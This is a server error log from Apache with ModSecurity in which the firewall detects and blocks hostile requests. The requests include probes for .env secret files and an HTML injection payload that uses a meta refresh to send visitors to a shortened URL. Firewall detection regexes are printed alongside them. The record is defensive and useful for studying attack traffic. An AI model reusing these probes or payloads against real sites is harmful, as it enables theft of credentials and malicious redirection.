[Mon May 11 12:15:59.737031 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:45194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsXr4KNmD_mZ_vlf9BowAAAEY"]
[Mon May 11 12:15:59.762982 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:45208] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.dev.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/react/.env.dev.rc1"] [unique_id "agGsX0Rdw2n9wv6Ai48QVAAAAIw"]
[Mon May 11 12:15:59.763210 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:45208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/react/.env.dev.rc1"] [unique_id "agGsX0Rdw2n9wv6Ai48QVAAAAIw"]
[Mon May 11 12:16:00.916007 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:45208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsX0Rdw2n9wv6Ai48QVAAAAIw"]
[Mon May 11 12:16:00.946455 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:45210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.dev.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.dev.rc1"] [unique_id "agGsYERdw2n9wv6Ai48QVQAAAI8"]
[Mon May 11 12:16:00.946843 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:45210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.dev.rc1"] [unique_id "agGsYERdw2n9wv6Ai48QVQAAAI8"]
[Mon May 11 12:16:02.174382 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:45210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsYERdw2n9wv6Ai48QVQAAAI8"]
[Mon May 11 12:16:02.198951 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:45220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.dist-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/react/.env.dist-old"] [unique_id "agGsYhjZymfuKpjWXeiFlAAAANU"]
[Mon May 11 12:16:02.199306 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:45220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/react/.env.dist-old"] [unique_id "agGsYhjZymfuKpjWXeiFlAAAANU"]
[Mon May 11 12:16:03.353795 2026] [security2:error] [pid 1254133:tid 1254157] [client 185.177.72.9:45220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsYhjZymfuKpjWXeiFlAAAANU"]
[Mon May 11 12:16:03.380984 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:13372] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env.dist-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.dist-old"] [unique_id "agGsY2S6k_SCYd1AVZq3ggAAAQc"]
[Mon May 11 12:16:03.381207 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:13372] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/react/.env.dist-old"] [unique_id "agGsY2S6k_SCYd1AVZq3ggAAAQc"]
[Mon May 11 12:16:04.574737 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:13372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsY2S6k_SCYd1AVZq3ggAAAQc"]
[Mon May 11 12:16:09.497636 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:13398] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.local2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/register/.env.local2024"] [unique_id "agGsaURdw2n9wv6Ai48QYAAAAIU"]
[Mon May 11 12:16:09.497851 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:13398] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/register/.env.local2024"] [unique_id "agGsaURdw2n9wv6Ai48QYAAAAIU"]
[Mon May 11 12:16:10.666491 2026] [security2:error] [pid 1254328:tid 1254336] [client 185.177.72.9:13398] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsaURdw2n9wv6Ai48QYAAAAIU"]
[Mon May 11 12:16:10.695849 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:13412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /register/.env.local2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.local2024"] [unique_id "agGsamS6k_SCYd1AVZq3jAAAARc"]
[Mon May 11 12:16:10.696178 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:13412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/register/.env.local2024"] [unique_id "agGsamS6k_SCYd1AVZq3jAAAARc"]
[Mon May 11 12:16:11.936909 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:13412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsamS6k_SCYd1AVZq3jAAAARc"]
[Mon May 11 12:16:15.367946 2026] [authz_core:error] [pid 1254328:tid 1254331] [client 46.22.0.193:59886] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 12:16:17.190934 2026] [authz_core:error] [pid 1254328:tid 1254331] [client 46.22.0.193:59886] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 12:16:18.916393 2026] [authz_core:error] [pid 1254328:tid 1254331] [client 46.22.0.193:59886] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 12:16:20.833729 2026] [authz_core:error] [pid 1254328:tid 1254331] [client 46.22.0.193:59886] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 12:16:44.184033 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://w.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://cleanuri.com/nmbbv1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.190546 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.193381 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.195044 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.196472 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.196886 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.198180 2026] [security2:error] [pid 1254242:tid 1254255] [client 194.233.64.127:53644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjL4KNmD_mZ_vlf9B0AAAAEo"]
[Mon May 11 12:16:44.942989 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://w.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://cleanuri.com/nmbbv1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.943868 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.944622 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.945863 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver 